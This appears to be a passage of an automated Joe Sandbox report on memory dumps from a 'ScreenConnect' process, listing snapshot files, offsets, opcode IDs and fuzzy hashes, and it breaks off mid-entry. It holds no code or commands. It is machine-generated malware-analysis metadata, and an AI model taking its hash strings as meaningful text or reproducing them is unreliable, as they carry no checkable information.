                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3cfecbe372119abb681c19eca6637e86a00f4519d140e34cdaaf7c75a38ea40f
                                                                                                                                                                                • Instruction ID: 5ca7b99c24fdf04f7fadff887d31a70ca108ea783f779bec64b7c3fd628427f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cfecbe372119abb681c19eca6637e86a00f4519d140e34cdaaf7c75a38ea40f
                                                                                                                                                                                • Instruction Fuzzy Hash: A4218E70E103099FCF08EFA8D58496EBBB5FF84700B008969D605A7358CB30A955CF92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 46b5e6706f4f4b4eec8887b8699f80a64dea8b01de4afa999720fd406e07887d
                                                                                                                                                                                • Instruction ID: 304f497b127e707848b047a27f9a83fd057837642f6990af5ac2bf99883eb4a6
                                                                                                                                                                                • Opcode Fuzzy Hash: 46b5e6706f4f4b4eec8887b8699f80a64dea8b01de4afa999720fd406e07887d
                                                                                                                                                                                • Instruction Fuzzy Hash: 4511A171E40209AFDB19CA6DC840AABB7F6EFC4300F14C566D554D7254E7729A01CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7663f9e35ac8d1fa0fa075d5eda25c50b4eee1f5bf849f52e2039f045a056305
                                                                                                                                                                                • Instruction ID: a8f4af1b83ac236ff5ea5dc899c992c63193d69d45205c46cdf01d584ae86b25
                                                                                                                                                                                • Opcode Fuzzy Hash: 7663f9e35ac8d1fa0fa075d5eda25c50b4eee1f5bf849f52e2039f045a056305
                                                                                                                                                                                • Instruction Fuzzy Hash: 870196357007128FCB25DB6DD48451BB7D9BFCD66831540A9D54A8B354DF20EC02CBC1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 74ba8bd06efbac4f1e4e9b6a0b2ba3f2f278078de2a43a24f5d09323a839e2a6
                                                                                                                                                                                • Instruction ID: c2a4f78d7a3220b7ab7f5011520fdf7bf5d40d39387043be63902a7ab4583d52
                                                                                                                                                                                • Opcode Fuzzy Hash: 74ba8bd06efbac4f1e4e9b6a0b2ba3f2f278078de2a43a24f5d09323a839e2a6
                                                                                                                                                                                • Instruction Fuzzy Hash: B6114671A0001EDFCB09DFACD9909ECBBB2EF85304B49C555E005AB129DB32A94ACB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 11198c0e31a41583f7922089b4e544454f2b2b51f299226b460bb272847ad272
                                                                                                                                                                                • Instruction ID: 026b3c23c3e55d196c99b3531708d573df4bbcf2577da69cc8444b3410c3b332
                                                                                                                                                                                • Opcode Fuzzy Hash: 11198c0e31a41583f7922089b4e544454f2b2b51f299226b460bb272847ad272
                                                                                                                                                                                • Instruction Fuzzy Hash: AE113330D402188FDF19DB68D961BEDBBB2AF88310F104829D102BB364DB791D41CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 16aae5e1a34dc1cf6f6f9e6665262c2712ed42aedee47ce9b14cb88e8d025a4a
                                                                                                                                                                                • Instruction ID: ec37bc982fb07a31bab4b972376f9174f56630bd7027d5c9470673dc2a210ab0
                                                                                                                                                                                • Opcode Fuzzy Hash: 16aae5e1a34dc1cf6f6f9e6665262c2712ed42aedee47ce9b14cb88e8d025a4a
                                                                                                                                                                                • Instruction Fuzzy Hash: E1111F31E4021D8FDF18DBA8D9616DDBBB1AF49310F000869D106BB274DB741D45CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd970e5037bada765d59dca2da362bbd3edf6e22a5be32859ac12139afd09203
                                                                                                                                                                                • Instruction ID: 46e3bd1439d2bd404d1c8a0089ef2929f49dcd46a6d1e45c6a51960ba29a368b
                                                                                                                                                                                • Opcode Fuzzy Hash: bd970e5037bada765d59dca2da362bbd3edf6e22a5be32859ac12139afd09203
                                                                                                                                                                                • Instruction Fuzzy Hash: EC01B1B650D3E08FD71A8B3858297A93F64DB5B610F4601DBE0918B5A3D3654806E763
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 72163764706f45f681b94a1cb2f1023b831b2838093abf81944168e0a6048daf
                                                                                                                                                                                • Instruction ID: 4a0d10bb63b5bd47efc19d1ffe1d45ac119ec20dc405ea5b3a9d2f52cc354804
                                                                                                                                                                                • Opcode Fuzzy Hash: 72163764706f45f681b94a1cb2f1023b831b2838093abf81944168e0a6048daf
                                                                                                                                                                                • Instruction Fuzzy Hash: E211003590020A9FCF00DFA8D9409DEBBF5FF49354B10856AE605BB265D772AA0ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4a004b4286158e72485246c4312d468f489bfed67a579d5c7d36c3bdb58bd3c6
                                                                                                                                                                                • Instruction ID: 79287d641bb0c5d021f767a79665d03476a8bff7a95485afea7d2ebb02f73223
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a004b4286158e72485246c4312d468f489bfed67a579d5c7d36c3bdb58bd3c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F01F7313043091BC705F7799491A2FB6DBDFC0690754853EE11A8B354DF30DC098792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 464f59c0945411f67151e38c037213e7f71cc0c6788af58903b5992efa59dfb4
                                                                                                                                                                                • Instruction ID: 67880b3f275cb54fcb80f1c22c50bea253aab4381bb499d726ec9b846b79af22
                                                                                                                                                                                • Opcode Fuzzy Hash: 464f59c0945411f67151e38c037213e7f71cc0c6788af58903b5992efa59dfb4
                                                                                                                                                                                • Instruction Fuzzy Hash: B6116D31E4015ADFCB09DFA9D8448CDBBB2EF89314F45853AD805BB255DB31A91BCB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7c70cfd2dd8cca4e727b984f21d801bfb48c2a017bcc533bf44d6ecd091dea51
                                                                                                                                                                                • Instruction ID: 75890a725bd46047722f40b942891abc96c20bb3db3f47ec9da42fc8534bcfab
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c70cfd2dd8cca4e727b984f21d801bfb48c2a017bcc533bf44d6ecd091dea51
                                                                                                                                                                                • Instruction Fuzzy Hash: FA012B303815018FDB26F7B8981459D7BB5DFC5750B458466C01EDB791EE24490393D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 518eaaccddc6bf5a1835b03d5d53b8c31b8d8c35654bcfa3a23d025c0bb56142
                                                                                                                                                                                • Instruction ID: 889a564f91866283b5c3a63eb109713d449da832e91e1b16ac8eb5b05979f0d5
                                                                                                                                                                                • Opcode Fuzzy Hash: 518eaaccddc6bf5a1835b03d5d53b8c31b8d8c35654bcfa3a23d025c0bb56142
                                                                                                                                                                                • Instruction Fuzzy Hash: AA01A231B103155B8B1DDB6DA94486BBAEDEFC4664314896BD505DB305EFB1DC0687C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bc3c203506221d4b25693de40db1a6ae76b17a625e26b2292f8b77f66d992416
                                                                                                                                                                                • Instruction ID: dc72f7680e56bde19ca2180b8ad9c8573c0fa0c166f9ca1ad79755e5040d7cee
                                                                                                                                                                                • Opcode Fuzzy Hash: bc3c203506221d4b25693de40db1a6ae76b17a625e26b2292f8b77f66d992416
                                                                                                                                                                                • Instruction Fuzzy Hash: 95012175B0011A9BDF10DA9DD8049EFB7B9EFC8211F048537E515E7240EB309A1587E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 53d66428c44cd8e49e70579415b456e8c36ae3de3493681ba3f8dff68016531e
                                                                                                                                                                                • Instruction ID: ea751f75be623c6dc32022cbfe0f7cddbba20aaa1bf0e82ed59f8628d5824fe6
                                                                                                                                                                                • Opcode Fuzzy Hash: 53d66428c44cd8e49e70579415b456e8c36ae3de3493681ba3f8dff68016531e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F012B31104348DAD7208A35CCC4B77BFDCEF46320F18C4AAEE480B286C6799809C6B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6383b3a94e4eca4da5422ce3f86aabe694ce3faa9455e897d36ce37181f3fba5
                                                                                                                                                                                • Instruction ID: ac388dccac7a129ce6780fadc653a532a1e9a63a943634d706bba917d708975b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6383b3a94e4eca4da5422ce3f86aabe694ce3faa9455e897d36ce37181f3fba5
                                                                                                                                                                                • Instruction Fuzzy Hash: 8E112A3090170ACFCB18DF6CC585AADBBF4EF45324F11869AE515EB2A2EB70D581CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3e6df1f23ed11d28cfcba12c3e84e1add6bb540c8985862291f45b0f2214b3c5
                                                                                                                                                                                • Instruction ID: f4a709bdeb56f3dedac11164d18a5deaf1944b1e3028d17cb391e75a5e78a830
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6df1f23ed11d28cfcba12c3e84e1add6bb540c8985862291f45b0f2214b3c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B01703034D3418FC30B9B6DA9A4A5A7FE9DF8221030884F7D009CB266DF309D06C750
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 50758c8bdad01b9a8924ee94ea6248595f4c212c592e6b60ef4e2aaa1066cb37
                                                                                                                                                                                • Instruction ID: f43fe3a592355a097c0b0fa9e4fdca6e80c89a22beaa87a302fa87a6951096c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 50758c8bdad01b9a8924ee94ea6248595f4c212c592e6b60ef4e2aaa1066cb37
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A018470E0020DAFDF04EBA8E8515EDBBB5EFC8350F1085AAC41597354EF315A068B80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a51603758a32c0678de3da0a76acdd6671fe49b2348aa66ee3c624b4ef0201ba
                                                                                                                                                                                • Instruction ID: a16a1cf926bd99b8716cbf5fa63dad73806b25e34ce82f8b25e9a05b1b245d72
                                                                                                                                                                                • Opcode Fuzzy Hash: a51603758a32c0678de3da0a76acdd6671fe49b2348aa66ee3c624b4ef0201ba
                                                                                                                                                                                • Instruction Fuzzy Hash: DC01527150D3C49ED7128B258894766BFB4EF53224F1984DBD9888F1D3C2699849C772
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 438975bc6a59ee0800d1d2a09728d66b6fd6534ada07440a46e315ef8b94db5c
                                                                                                                                                                                • Instruction ID: 9b789260e61021537103f46ce9f547e1d99da7cd2e72b8f2402297169c939d51
                                                                                                                                                                                • Opcode Fuzzy Hash: 438975bc6a59ee0800d1d2a09728d66b6fd6534ada07440a46e315ef8b94db5c
                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0A4322042496FCB069FA89C509EE3BF6EFC8360B04441AE509D72A1CB3189129791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 97b3c52b636742290e5ca5be10d888e8a1c2d8a9d630c8cc92ab46ebd394c201
                                                                                                                                                                                • Instruction ID: cebd93277e511969535e692b70053133f1af7156ceafe70f551b8a0a654cf0e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 97b3c52b636742290e5ca5be10d888e8a1c2d8a9d630c8cc92ab46ebd394c201
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C01F9724492918FC702C778EC955C8BFF4EF5232174944EEC5C58B512E7392587DB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 703d7dbbadef53d0878cab2b7d6176a45c032056b305b81ef3e97a0da9f832fa
                                                                                                                                                                                • Instruction ID: 9c7386447153158dc2fc767645773f722a00182e185b5ea853306ef16fbba264
                                                                                                                                                                                • Opcode Fuzzy Hash: 703d7dbbadef53d0878cab2b7d6176a45c032056b305b81ef3e97a0da9f832fa
                                                                                                                                                                                • Instruction Fuzzy Hash: BBF0D631B1020A9BEF14EBACA4911ADB7F9DFCC610B1445BBC045A7798DE30880687C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 687b78257834c478e1c414e655f698e80fb5b5e4d9c2973538be0b0bcb16221f
                                                                                                                                                                                • Instruction ID: db4dcd1b9b711762e5cc79b4747d6fefc629682edcea13c15f877be9b8ddeeb0
                                                                                                                                                                                • Opcode Fuzzy Hash: 687b78257834c478e1c414e655f698e80fb5b5e4d9c2973538be0b0bcb16221f
                                                                                                                                                                                • Instruction Fuzzy Hash: E8012832E0015EDBCB09DFA9D9148CDBBF6EF89314F05846AE505BB264DB316906CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3522db8bbf64ca5e5929078e11a80bc35510e1f930a7c1cd3f98c241d4742888
                                                                                                                                                                                • Instruction ID: 7248c549dd2ff7c0c51cc5f4aa681c45e84eb8080209535cffed954f97065a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 3522db8bbf64ca5e5929078e11a80bc35510e1f930a7c1cd3f98c241d4742888
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0C9B1E00115DFCB44DFADD842AEDBBF1EF88210B15C169E918E7210E3329A12CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 84c08a9bffddc649db93adf4d81bfadf1ec7ee5291026393b4cb3de275fc8afd
                                                                                                                                                                                • Instruction ID: 99462e640bb0539b57541d3e380ac8e5d4837fd3eab930da3a90f5ef3dd29198
                                                                                                                                                                                • Opcode Fuzzy Hash: 84c08a9bffddc649db93adf4d81bfadf1ec7ee5291026393b4cb3de275fc8afd
                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF08C77B0D2185FD728CABEA40069BBBDECBC5224B14C07FE54DC3740E935A4018768
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 45448f6adc686f0a3955f2db32577fab31397baa740955a7c5ee1e669d96cc93
                                                                                                                                                                                • Instruction ID: 4af406126f77c34fd1ebaa989968ad0cb880e50b520612bfb7519bd8d0c7cec5
                                                                                                                                                                                • Opcode Fuzzy Hash: 45448f6adc686f0a3955f2db32577fab31397baa740955a7c5ee1e669d96cc93
                                                                                                                                                                                • Instruction Fuzzy Hash: 15F0EC32A0E2D11FC7274B796C69AEA3FB8CE8202030E01E7D488CB243D6045C0AC7A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c75b840177e872304eb23f34030594dd47cccd64d6f031a0be4936f3e6a9801e
                                                                                                                                                                                • Instruction ID: 870ec603d0b3c966bf0db070f2c88b2c12180fb69221c83d1dd9f7b58ae96d3d
                                                                                                                                                                                • Opcode Fuzzy Hash: c75b840177e872304eb23f34030594dd47cccd64d6f031a0be4936f3e6a9801e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF0C2316002005BDB08E7AA9804A5EBBEADFC5790709C57BE0099B264EF31D906CBC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8d2aabbc53d9d919c1306c585bf9acca7a9a1ee31e2312f9d58efdd4c716b649
                                                                                                                                                                                • Instruction ID: 0fcdcb7d4dface2645bd2629d60f02cb2ca600f7971aa99e433a74bfe2d23c70
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d2aabbc53d9d919c1306c585bf9acca7a9a1ee31e2312f9d58efdd4c716b649
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0E2307447016B8219AA6EA99095BBFDEEFC4A50304C42AE11ACB308DF70FC068790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 287d07fd14a3a51e4243962258654545d92a13dde18aafd3fe55ca41a53d3c32
                                                                                                                                                                                • Instruction ID: 3b8cd40582e4831bface86f84f117d8d6744cbb3cddd84cebe331318bd3b1aab
                                                                                                                                                                                • Opcode Fuzzy Hash: 287d07fd14a3a51e4243962258654545d92a13dde18aafd3fe55ca41a53d3c32
                                                                                                                                                                                • Instruction Fuzzy Hash: FEF0BE313012008FC318DB68E985EA6BBE6EFD9300B0985A9E405CB361D6B5EC01CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 71d9117c893f2b5a5bc7c2290516e2884f71e183f705bf35944156d668c4e967
                                                                                                                                                                                • Instruction ID: 876d1d2c9a8f9899512f2bcc91e98920f20959ddbf172017712a535f3a9c18fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 71d9117c893f2b5a5bc7c2290516e2884f71e183f705bf35944156d668c4e967
                                                                                                                                                                                • Instruction Fuzzy Hash: 31F027313143404FC7149FADA8C96AE7BE2EFC9A50718416EE249C7341CE214C068754
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f2fcdd9ee7220be8ba79addd5f041f57368fdf1a0a97886af5744a12dfd75628
                                                                                                                                                                                • Instruction ID: d14a1c189640b512df5481bb3b4278c271375e50a9a4ab3db713771ffb944fd8
